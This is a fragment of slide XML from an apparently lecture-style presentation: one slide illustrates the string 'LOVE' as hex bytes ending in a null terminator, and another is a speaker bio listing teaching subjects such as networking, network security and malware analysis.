            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="321" name="Google Shape;321;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642688" y="2492896"/>
              <a:ext cx="1296144" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="322" name="Google Shape;322;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1910495" y="2101498"/>
              <a:ext cx="31451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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="323" name="Google Shape;323;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3219565" y="2101497"/>
              <a:ext cx="39305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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="324" name="Google Shape;324;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4515709" y="2110959"/>
              <a:ext cx="36740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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811853" y="2110959"/>
              <a:ext cx="33534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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="326" name="Google Shape;326;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6632879" y="1649294"/>
              <a:ext cx="175554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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Null </a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403648" y="3144281"/>
            <a:ext cx="6984776" cy="1584176"/>
            <a:chOff x="1406561" y="4365104"/>
            <a:chExt cx="6984776" cy="1584176"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="328" name="Google Shape;328;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1406561" y="5229200"/>
              <a:ext cx="664102" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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4C</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="329" name="Google Shape;329;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731661" y="5208706"/>
              <a:ext cx="648072" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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4F</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="330" name="Google Shape;330;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4027805" y="5208706"/>
              <a:ext cx="674521" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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56</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Google Shape;331;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5376847" y="5208706"/>
              <a:ext cx="605593" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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45</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="332" name="Google Shape;332;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6645601" y="5208706"/>
              <a:ext cx="648072" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="333" name="Google Shape;333;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1913408" y="4542050"/>
              <a:ext cx="31451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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Google Shape;334;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3222478" y="4542049"/>
              <a:ext cx="39305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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="335" name="Google Shape;335;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4518622" y="4551511"/>
              <a:ext cx="36740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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="336" name="Google Shape;336;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5814766" y="4551511"/>
              <a:ext cx="33534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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="337" name="Google Shape;337;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6635792" y="4365104"/>
              <a:ext cx="175554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dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Null </a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="338" name="Google Shape;338;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2070663" y="5229200"/>
              <a:ext cx="664102" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Google Shape;339;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3379733" y="5208706"/>
              <a:ext cx="648072" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="340" name="Google Shape;340;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4702326" y="5208706"/>
              <a:ext cx="674521" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Google Shape;341;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5982440" y="5229200"/>
              <a:ext cx="605593" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="Google Shape;342;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7290760" y="5196101"/>
              <a:ext cx="648072" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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00</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="343" name="Google Shape;343;p29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="2728748" y="4509120"/>
              <a:ext cx="6017" cy="548481"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="344" name="Google Shape;344;p29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4018278" y="4499658"/>
              <a:ext cx="6017" cy="548481"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="345" name="Google Shape;345;p29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="5321496" y="4536703"/>
              <a:ext cx="6017" cy="548481"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="346" name="Google Shape;346;p29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="6582016" y="4506361"/>
              <a:ext cx="6017" cy="548481"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxn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3"/>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Bio</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p3"/>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GB" sz="2400"/>
              <a:t>Teaching</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Computer networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Broadband networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Wireless and Sensor networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Network security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Malware analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Web programming</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Cloud computing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Linux OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>IP routing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-158750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290282" y="755412"/>
            <a:ext cx="65845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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
